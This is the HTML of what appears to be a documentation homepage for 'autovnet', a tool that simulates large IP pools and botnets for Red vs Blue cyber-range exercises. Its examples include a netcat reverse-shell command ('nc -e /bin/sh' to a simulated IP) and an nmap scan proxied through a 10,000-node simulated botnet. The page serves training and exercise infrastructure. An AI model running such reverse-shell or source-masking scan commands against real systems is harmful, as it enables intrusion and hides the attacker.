            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_6_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_6">
            <span class="md-nav__icon md-icon"></span>
            Reference
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="usage/help/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    autovnet
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
      
      
  
  
  
    
    
    
    
    
      
      
    
    <li class="md-nav__item md-nav__item--section md-nav__item--nested">
      
        
        
        
          
        
        <input class="md-nav__toggle md-toggle md-toggle--indeterminate" type="checkbox" id="__nav_7" >
        
          
          <label class="md-nav__link" for="__nav_7" id="__nav_7_label" tabindex="">
            
  
  <span class="md-ellipsis">
    Resources
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_7_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_7">
            <span class="md-nav__icon md-icon"></span>
            Resources
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="resources/faq/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    FAQ
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="resources/troubleshooting/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Troubleshooting
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="resources/changelog/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Changelog
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="resources/wild/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    In The Wild
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="resources/refs/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    References
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
  </ul>
</nav>
                  </div>
                </div>
              </div>
            
            
          
          
            <div class="md-content" data-md-component="content">
              <article class="md-content__inner md-typeset">
                
                  

  
  


<h1 id="autovnet">autovnet<a class="headerlink" href="#autovnet" title="Permanent link">&para;</a></h1>
<div class="toc">
<ul>
<li><a href="#autovnet">autovnet</a><ul>
<li><a href="#description">Description</a></li>
<li><a href="#why-autovnet">Why autovnet?</a></li>
<li><a href="#80-443-for-everyone">:80 / :443 For Everyone!</a></li>
<li><a href="#botnets-for-everyone">Botnets for Everyone!</a><ul>
<li><a href="#attacker">Attacker</a></li>
<li><a href="#target">Target</a></li>
</ul>
</li>
<li><a href="#finally-a-solution-that-sparks-joy">Finally, a Solution that Sparks Joy</a></li>
<li><a href="#but-wait-theres-more-multiplayer-collaboration">But Wait, There's More: Multiplayer Collaboration!</a></li>
<li><a href="#how-is-something-this-awesome-even-possible">How is Something This Awesome Even Possible?</a></li>
<li><a href="#get-started">Get Started</a></li>
</ul>
</li>
</ul>
</div>
<h2 id="description">Description<a class="headerlink" href="#description" title="Permanent link">&para;</a></h2>
<p><code>autovnet</code> provides simple, performant, intuitive, internet-scale IP network simulation, empowering Cyber Range administrators and virtual Red Teamers to provide unprecedented realism in adversary emulation for "Red vs Blue" cyber exercises and competitions.</p>
<p>Red Teamers simply import the game configuration from a central <em>autovnet server</em>, and each Red Teamer can immediately, concurrently emulate arbitrarily many (e.g. <em>millions</em>) of unique actors with various levels of sophistication, each with separate Command and Control (C2) infrastructure and IP addresses.</p>
<p>This is <a href="rtfm/">Red Team Force Multiplication (RTFM)</a> - the ultimate goal for Red Team Cyber Wargame infrastructure - finally made possible at scale with <code>autovnet</code>.</p>
<p><img alt="setup" src="img/term/client/setup.svg" /></p>
<h2 id="why-autovnet">Why <code>autovnet</code>?<a class="headerlink" href="#why-autovnet" title="Permanent link">&para;</a></h2>
<p>Ever done a Red vs Blue Wargame, competition, or other hacking excercise?</p>
<p><code>autovnet</code> solves the <em>'Red Team IP'</em> problem, and provides the infrastructure and tooling necessary to achieve <code>Red Team Force Multiplication (RTFM)</code>.</p>
<p>To our knowledge, it is already <em>by far</em> the best available solution in virtually every aspect, and more features are planned that will build on the current foundation to change the game again.</p>
<h2 id="80-443-for-everyone"><code>:80</code> / <code>:443</code> For Everyone!<a class="headerlink" href="#80-443-for-everyone" title="Permanent link">&para;</a></h2>
<ul>
<li>
<p>Every Red Teamer can catch a reverse shell to <code>RANDOM_IP:443</code> at the same time!</p>
</li>
<li>
<p>Every Red Teamer can catch <em>as many reverse shells as they want</em> to <code>RANDOM_IP:443</code> at the same time!</p>
</li>
<li>There are <em>millions</em> -&gt; <em>billions</em> of available IPs; <code>autovnet</code> will randomly generate them from its IP pool</li>
</ul>
<div class="highlight"><pre><span></span><code><span class="c1"># Attacker</span>
<span class="c1"># Catch a callback on a random, &#39;public&#39; IP address</span>
<span class="c1">#   from a pool of literally up to the entire IPv4 space (billions of IPs)</span>

$<span class="w"> </span>autovnet<span class="w"> </span>rtfm<span class="w"> </span>pwncat
<span class="o">[</span>+<span class="o">]</span><span class="w"> </span>autovnet<span class="w"> </span>rtfm<span class="w"> </span>pwncat<span class="w"> </span>bumpy_travel
<span class="o">[</span>+<span class="o">]</span><span class="w"> </span>bumpy_travel<span class="w"> </span><span class="p">|</span><span class="w"> </span><span class="m">10</span>.203.18.81:443<span class="w"> </span><span class="o">=</span>&gt;<span class="w"> </span><span class="m">127</span>.0.0.1:61869
<span class="o">[</span><span class="m">17</span>:07:19<span class="o">]</span><span class="w"> </span>Welcome<span class="w"> </span>to<span class="w"> </span>pwncat<span class="w"> </span>🐈!<span class="w"> </span>
bound<span class="w"> </span>to<span class="w"> </span><span class="m">127</span>.0.0.1:61869<span class="w"> </span>...<span class="w"> </span>

<span class="c1"># Each attacker can run N times concurrently, have N active shells on N different IPs </span>
</code></pre></div>
<div class="highlight"><pre><span></span><code><span class="c1"># Target</span>
<span class="c1"># Throw shell to random, emphemeral IP</span>
$<span class="w"> </span>nc<span class="w"> </span>-e<span class="w"> </span>/bin/sh<span class="w"> </span><span class="m">10</span>.203.18.81<span class="w"> </span><span class="m">443</span><span class="w"> </span>
</code></pre></div>
<h2 id="botnets-for-everyone">Botnets for Everyone!<a class="headerlink" href="#botnets-for-everyone" title="Permanent link">&para;</a></h2>
<ul>
<li>Every Red Teamer can scan Blue Team 'from' (source IPs) a virtual botnet of literally up to the entire IPv4 space (billions of IPs)</li>
</ul>
<h3 id="attacker">Attacker<a class="headerlink" href="#attacker" title="Permanent link">&para;</a></h3>
<div class="highlight"><pre><span></span><code><span class="c1"># Attacker</span>
<span class="c1"># Scan &#39;from&#39; a 10k node botnet</span>
$<span class="w"> </span>autovnet<span class="w"> </span>rtfm<span class="w"> </span>proxychains<span class="w"> </span>run<span class="w"> </span>-c<span class="w"> </span><span class="m">10000</span><span class="w"> </span>--<span class="w"> </span>nmap<span class="w"> </span>-sT<span class="w"> </span>-sV<span class="w"> </span>-sC<span class="w"> </span>-p80<span class="w"> </span>BLUE_TEAM_IP

<span class="c1"># There are also handy .proxy (generic) and .proxy-nmap (nmap-specific) helpers</span>
<span class="c1"># .proxy nmap -sT -sV -sC -p80 BLUE_TEAM_IP</span>
<span class="c1"># .proxy-nmap -sT -sV -sC -p80 BLUE_TEAM_IP</span>
</code></pre></div>
<h3 id="target">Target<a class="headerlink" href="#target" title="Permanent link">&para;</a></h3>
<div class="highlight"><pre><span></span><code><span class="c1"># Target</span>
<span class="c1"># Logs show connections from thousands of unique IP addresses:</span>

$<span class="w"> </span>sudo<span class="w"> </span>python3<span class="w"> </span>-m<span class="w"> </span>http.server<span class="w"> </span><span class="m">80</span>
Serving<span class="w"> </span>HTTP<span class="w"> </span>on<span class="w"> </span><span class="m">0</span>.0.0.0<span class="w"> </span>port<span class="w"> </span><span class="m">80</span><span class="w"> </span><span class="o">(</span>http://0.0.0.0:80/<span class="o">)</span><span class="w"> </span>...
<span class="m">10</span>.137.203.202<span class="w"> </span>-<span class="w"> </span>-<span class="w"> </span><span class="o">[</span><span class="m">14</span>/Oct/2021<span class="w"> </span><span class="m">16</span>:50:18<span class="o">]</span><span class="w"> </span><span class="s2">&quot;GET / HTTP/1.0&quot;</span><span class="w"> </span><span class="m">200</span><span class="w"> </span>-
<span class="m">10</span>.137.210.167<span class="w"> </span>-<span class="w"> </span>-<span class="w"> </span><span class="o">[</span><span class="m">14</span>/Oct/2021<span class="w"> </span><span class="m">16</span>:50:18<span class="o">]</span><span class="w"> </span>code<span class="w"> </span><span class="m">501</span>,<span class="w"> </span>message<span class="w"> </span>Unsupported<span class="w"> </span>method<span class="w"> </span><span class="o">(</span><span class="s1">&#39;PROPFIND&#39;</span><span class="o">)</span>
<span class="m">10</span>.137.28.182<span class="w"> </span>-<span class="w"> </span>-<span class="w"> </span><span class="o">[</span><span class="m">14</span>/Oct/2021<span class="w"> </span><span class="m">16</span>:50:18<span class="o">]</span><span class="w"> </span>code<span class="w"> </span><span class="m">501</span>,<span class="w"> </span>message<span class="w"> </span>Unsupported<span class="w"> </span>method<span class="w"> </span><span class="o">(</span><span class="s1">&#39;OPTIONS&#39;</span><span class="o">)</span>
<span class="m">10</span>.137.113.124<span class="w"> </span>-<span class="w"> </span>-<span class="w"> </span><span class="o">[</span><span class="m">14</span>/Oct/2021<span class="w"> </span><span class="m">16</span>:50:18<span class="o">]</span><span class="w"> </span>code<span class="w"> </span><span class="m">404</span>,<span class="w"> </span>message<span class="w"> </span>File<span class="w"> </span>not<span class="w"> </span>found
<span class="m">10</span>.137.113.124<span class="w"> </span>-<span class="w"> </span>-<span class="w"> </span><span class="o">[</span><span class="m">14</span>/Oct/2021<span class="w"> </span><span class="m">16</span>:50:18<span class="o">]</span><span class="w"> </span><span class="s2">&quot;GET /nmaplowercheck1634244618 HTTP/1.1&quot;</span><span class="w"> </span><span class="m">404</span><span class="w"> </span>-
<span class="m">10</span>.137.210.167<span class="w"> </span>-<span class="w"> </span>-<span class="w"> </span><span class="o">[</span><span class="m">14</span>/Oct/2021<span class="w"> </span><span class="m">16</span>:50:18<span class="o">]</span><span class="w"> </span><span class="s2">&quot;PROPFIND / HTTP/1.1&quot;</span><span class="w"> </span><span class="m">501</span><span class="w"> </span>-
<span class="m">10</span>.137.48.254<span class="w"> </span>-<span class="w"> </span>-<span class="w"> </span><span class="o">[</span><span class="m">14</span>/Oct/2021<span class="w"> </span><span class="m">16</span>:50:18<span class="o">]</span><span class="w"> </span><span class="s2">&quot;GET / HTTP/1.1&quot;</span><span class="w"> </span><span class="m">200</span><span class="w"> </span>-
<span class="m">10</span>.137.172.184<span class="w"> </span>-<span class="w"> </span>-<span class="w"> </span><span class="o">[</span><span class="m">14</span>/Oct/2021<span class="w"> </span><span class="m">16</span>:50:18<span class="o">]</span><span class="w"> </span>code<span class="w"> </span><span class="m">501</span>,<span class="w"> </span>message<span class="w"> </span>Unsupported<span class="w"> </span>method<span class="w"> </span><span class="o">(</span><span class="s1">&#39;OPTIONS&#39;</span><span class="o">)</span>
<span class="m">10</span>.137.7.8<span class="w"> </span>-<span class="w"> </span>-<span class="w"> </span><span class="o">[</span><span class="m">14</span>/Oct/2021<span class="w"> </span><span class="m">16</span>:50:18<span class="o">]</span><span class="w"> </span><span class="s2">&quot;GET / HTTP/1.0&quot;</span><span class="w"> </span><span class="m">200</span><span class="w"> </span>-
<span class="m">10</span>.137.255.232<span class="w"> </span>-<span class="w"> </span>-<span class="w"> </span><span class="o">[</span><span class="m">14</span>/Oct/2021<span class="w"> </span><span class="m">16</span>:50:18<span class="o">]</span><span class="w"> </span>code<span class="w"> </span><span class="m">501</span>,<span class="w"> </span>message<span class="w"> </span>Unsupported<span class="w"> </span>method<span class="w"> </span><span class="o">(</span><span class="s1">&#39;POST&#39;</span><span class="o">)</span>
<span class="m">10</span>.137.255.232<span class="w"> </span>-<span class="w"> </span>-<span class="w"> </span><span class="o">[</span><span class="m">14</span>/Oct/2021<span class="w"> </span><span class="m">16</span>:50:18<span class="o">]</span><span class="w"> </span><span class="s2">&quot;POST / HTTP/1.1&quot;</span><span class="w"> </span><span class="m">501</span><span class="w"> </span>-
<span class="m">10</span>.137.24.19<span class="w"> </span>-<span class="w"> </span>-<span class="w"> </span><span class="o">[</span><span class="m">14</span>/Oct/2021<span class="w"> </span><span class="m">16</span>:50:18<span class="o">]</span><span class="w"> </span>code<span class="w"> </span><span class="m">404</span>,<span class="w"> </span>message<span class="w"> </span>File<span class="w"> </span>not<span class="w"> </span>found
<span class="m">10</span>.137.24.19<span class="w"> </span>-<span class="w"> </span>-<span class="w"> </span><span class="o">[</span><span class="m">14</span>/Oct/2021<span class="w"> </span><span class="m">16</span>:50:18<span class="o">]</span><span class="w"> </span><span class="s2">&quot;GET /.git/HEAD HTTP/1.1&quot;</span><span class="w"> </span><span class="m">404</span><span class="w"> </span>-
<span class="m">10</span>.137.28.182<span class="w"> </span>-<span class="w"> </span>-<span class="w"> </span><span class="o">[</span><span class="m">14</span>/Oct/2021<span class="w"> </span><span class="m">16</span>:50:18<span class="o">]</span><span class="w"> </span><span class="s2">&quot;OPTIONS / HTTP/1.1&quot;</span><span class="w"> </span><span class="m">501</span><span class="w"> </span>-
<span class="m">10</span>.137.154.63<span class="w"> </span>-<span class="w"> </span>-<span class="w"> </span><span class="o">[</span><span class="m">14</span>/Oct/2021<span class="w"> </span><span class="m">16</span>:50:18<span class="o">]</span><span class="w"> </span>code<span class="w"> </span><span class="m">501</span>,<span class="w"> </span>message<span class="w"> </span>Unsupported<span class="w"> </span>method<span class="w"> </span><span class="o">(</span><span class="s1">&#39;POST&#39;</span><span class="o">)</span>
<span class="m">10</span>.137.154.63<span class="w"> </span>-<span class="w"> </span>-<span class="w"> </span><span class="o">[</span><span class="m">14</span>/Oct/2021<span class="w"> </span><span class="m">16</span>:50:18<span class="o">]</span><span class="w"> </span><span class="s2">&quot;POST /sdk HTTP/1.1&quot;</span><span class="w"> </span><span class="m">501</span><span class="w"> </span>-
<span class="m">10</span>.137.238.27<span class="w"> </span>-<span class="w"> </span>-<span class="w"> </span><span class="o">[</span><span class="m">14</span>/Oct/2021<span class="w"> </span><span class="m">16</span>:50:18<span class="o">]</span><span class="w"> </span>code<span class="w"> </span><span class="m">404</span>,<span class="w"> </span>message<span class="w"> </span>File<span class="w"> </span>not<span class="w"> </span>found
<span class="m">10</span>.137.238.27<span class="w"> </span>-<span class="w"> </span>-<span class="w"> </span><span class="o">[</span><span class="m">14</span>/Oct/2021<span class="w"> </span><span class="m">16</span>:50:18<span class="o">]</span><span class="w"> </span><span class="s2">&quot;GET /robots.txt HTTP/1.1&quot;</span><span class="w"> </span><span class="m">404</span><span class="w"> </span>-
...
</code></pre></div>
<blockquote>
<p>Wow, that's a lot of <em>IP addresses</em></p>
</blockquote>
<h2 id="finally-a-solution-that-sparks-joy">Finally, a Solution that Sparks Joy<a class="headerlink" href="#finally-a-solution-that-sparks-joy" title="Permanent link">&para;</a></h2>
<p>So, how can we possibly <em>implement</em> Red Team Force Multiplication for a Cyber Range / Cyber excercise <em>without</em> the power of money to obtain IP addresses?</p>
<p>That is: how can we just skip all the gross provisioning infrastructure stuff we don't actually care about and get an IP that is ready to use by our favorite hacking tools, like shown above?</p>
<p>Under the hood, the technical solution that makes <code>autovnet</code> possible is actually trivially simple!</p>
<p>We combine:</p>
<ul>
<li>The unlmited power of the Cyber Range network administrator, who acts as the Internet Service Provider (ISP) for the game network</li>
<li>The pretty neato power of finding the giants with extra standing-room on their shoulders, instead of badly reinventing the wheel<ul>
<li><a href="https://en.wikipedia.org/wiki/Linux_kernel"><code>Linux</code></a> (the kernel) is good at packets</li>
<li><a href="https://www.openssh.com/"><code>OpenSSH</code></a> is good at remote port forwarding (<code>GatewayPorts: clientspecified</code>)</li>
<li><a href="https://en.wikipedia.org/wiki/SOCKS"><code>SOCKS</code></a> is good at proxying</li>
<li><a href="https://www.inet.no/dante/"><code>dante</code></a> is a solid <code>SOCKS</code> server with that lets the dest IP of the <code>SOCKS</code> client control the source IP of the proxied traffic (<code>external.rotation: same-same</code>)</li>
</ul>
</li>
</ul>
<p>This approach gives us the ability to proxy traffic (primarily <code>TCP</code>) to and from existing tools, and gives the <code>autovnet</code> client control over what IP(s) are associated with the traffic.</p>
<ul>
<li>Essentially, all <code>autovnet</code> clients can roll a random IP address locally, and it is ready to use, because all IP addresses in the massive <code>autovnet</code> simulated network are real, valid IPs (see below for details)</li>
<li>Then, the client can save that random IP, and specifically request it later - e.g. if the player wants to restart a particular C2 server and use the same IP they had before.<ul>
<li>Note: If you are thinking: <em>But what if 2 unlucky players end up requesting the same IP?</em>, see the <a href="resources/troubleshooting/#the-birthday-problem-ip-conflicts">Birthday Problem Mitigations</a> that <code>autovnet</code> implements.</li>
</ul>
</li>
</ul>
<h2 id="but-wait-theres-more-multiplayer-collaboration">But Wait, There's More: Multiplayer Collaboration!<a class="headerlink" href="#but-wait-theres-more-multiplayer-collaboration" title="Permanent link">&para;</a></h2>
<p><code>autovnet</code> already provides the best available Red Team infrastructure <strong>for Blue Team</strong> (i.e. super realistic), and is tailored to be effortless for Red Team to adopt and use.</p>
<p>But <code>autovnet</code> is <em>also</em> the best available Red Team infrastructure <strong>for Red Team</strong>!</p>
<p>That is, <code>autovnet</code> is <strong>also</strong> a platform for Red Team collaboration, and enables unparalled support for <strong>secure</strong> real-time and asynchronous collaboration between players.</p>
<p>See <a href="usage/collaboration/">Collaboration</a> for the full list, but here are some highlights of the game-changing peer collaboration options you get <em>automatically</em> with a default <code>autovnet</code> install!</p>
<ul>
<li><a href="usage/collaboration/fs/">Shared directories that work like local directories</a></li>
<li><a href="usage/collaboration/hedgedoc/">Shared Markdown Notes / Collaborative Document Editing</a></li>
<li><a href="usage/collaboration/vnc/">(View-only) screen sharing</a></li>
<li><a href="usage/collaboration/msfdb/"><code>msfdb</code> (metasploit-framework database) sharing</a></li>
<li><a href="usage/collaboration/gitea/"><code>gitea</code> code sharing</a></li>
<li><a href="usage/collaboration/focalboard/"><code>focalboard</code> project management / kanban board sharing</a></li>
<li><a href="usage/collaboration/svc/">Your favorite, aribtrary <code>TCP</code> services, but shared</a></li>
</ul>
<h2 id="how-is-something-this-awesome-even-possible">How is Something This Awesome Even Possible?<a class="headerlink" href="#how-is-something-this-awesome-even-possible" title="Permanent link">&para;</a></h2>
<p>Great question!</p>
<p>The development process was simple:</p>
<ol>
<li>Play in lots of wargames, and see how note-taking, file-sharing, etc. is managed for Red Team(s)</li>
<li><em>Try not to cry; cry a lot</em></li>
<li>Create the <a href="usage/collaboration/">Red Team Collaboration Infrastructure</a> that your current infrastructure wants to be when it grows up</li>
</ol>
<p>Have <strong>you</strong> ever pasted <code>nmap</code> scan output into a Google Doc, uploaded multiple versions of a file in chat, etc.?</p>
<blockquote>
<p>Stop it. Get some help.</p>
</blockquote>
<h2 id="get-started">Get Started<a class="headerlink" href="#get-started" title="Permanent link">&para;</a></h2>
<p>Ready to unleash the power of <a href="rtfm/">Red Team Force Multiplication</a>?</p>
<p>Start with the <a href="setup/">Quick Start Guide</a>!</p>





                
              </article>
            </div>
          
          
        </div>
        
          <button type="button" class="md-top md-icon" data-md-component="top" hidden>
  
  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M13 20h-2V8l-5.5 5.5-1.42-1.42L12 4.16l7.92 7.92-1.42 1.42L13 8v12Z"/></svg>
  Back to top
</button>
        
      </main>
      
        <footer class="md-footer">
  
  <div class="md-footer-meta md-typeset">
    <div class="md-footer-meta__inner md-grid">
      <div class="md-copyright">
  
  
    Made with
    <a href="https://squidfunk.github.io/mkdocs-material/" target="_blank" rel="noopener">
      Material for MkDocs
    </a>
  
</div>
      
    </div>
  </div>
</footer>
      
    </div>
    <div class="md-dialog" data-md-component="dialog">
      <div class="md-dialog__inner md-typeset"></div>
    </div>
    
    
    <script id="__config" type="application/json">{"base": ".", "features": ["search.suggest", "search.highlight", "navigation.instant", "navigation.tracking", "navigation.tabs", "navigation.tabs.sticky", "navigation.top", "navigation.expand", "toc.integrate", "toc.follow", "navigation.top", "content.code.copy"], "search": "assets/javascripts/workers/search.f886a092.min.js", "translations": {"clipboard.copied": "Copied to clipboard", "clipboard.copy": "Copy to clipboard", "search.result.more.one": "1 more on this page", "search.result.more.other": "# more on this page", "search.result.none": "No matching documents", "search.result.one": "1 matching document", "search.result.other": "# matching documents", "search.result.placeholder": "Type to start searching", "search.result.term.missing": "Missing", "select.version": "Select version"}}</script>
    
    
      <script src="assets/javascripts/bundle.aecac24b.min.js"></script>
      
    
  </body>
</html>